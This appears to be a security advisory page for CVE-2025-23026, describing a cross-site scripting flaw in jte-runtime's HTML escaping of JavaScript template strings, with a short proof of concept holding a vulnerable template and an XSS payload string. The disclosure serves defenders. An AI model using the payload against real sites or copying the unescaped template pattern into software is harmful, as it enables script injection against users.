logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-23026 gg.jte:jte-runtime

Package

Manager: maven
Name: gg.jte:jte-runtime
Vulnerable Version: >=0 <3.1.16

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

EPSS: 0.00051 pctl0.15708

Details

jte's HTML templates containing Javascript template strings are subject to XSS ### Summary Jte HTML templates with `script` tags or script attributes that include a Javascript template string (backticks) are subject to XSS. ### Details The `javaScriptBlock` and `javaScriptAttribute` methods in the `Escape` class ([source](https://github.com/casid/jte/blob/main/jte-runtime/src/main/java/gg/jte/html/escape/Escape.java#L43-L83)) do not escape backticks, which are used for Javascript [template strings](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#description). Dollar signs in template strings should also be escaped as well to prevent undesired interpolation. ### PoC 1. Use the [Jte Gradle Plugin](https://jte.gg/gradle-plugin/) with the following code in `src/jte/xss.jte`: ```html @param String someMessage <!DOCTYPE html> <html lang="en"> <head> <title>XSS Test</title> <script>window.someVariable = `${someMessage}`;</script> </head> <body> <h1>XSS Test</h1> </body> </html> ``` 2. Use the following Java code to demonstrate the XSS vulnerability: ```java final StringOutput output = new StringOutput(); JtexssGenerated.render(new OwaspHtmlTemplateOutput(output), null, "` + alert(`xss`) + `"); renderHtml(output); ``` ### Impact HTML templates rendered by Jte's `OwaspHtmlTemplateOutput` in versions less than or equal to `3.1.15` with `script` tags or script attributes that contain Javascript template strings (backticks) are vulnerable.

Metadata

Created: 2025-01-13T16:57:59Z
Modified: 2025-01-13T21:49:25Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-vh22-6c6h-rm8q/GHSA-vh22-6c6h-rm8q.json
CWE IDs: ["CWE-150", "CWE-79"]
Alternative ID: GHSA-vh22-6c6h-rm8q
Finding: F008
Auto approve: 1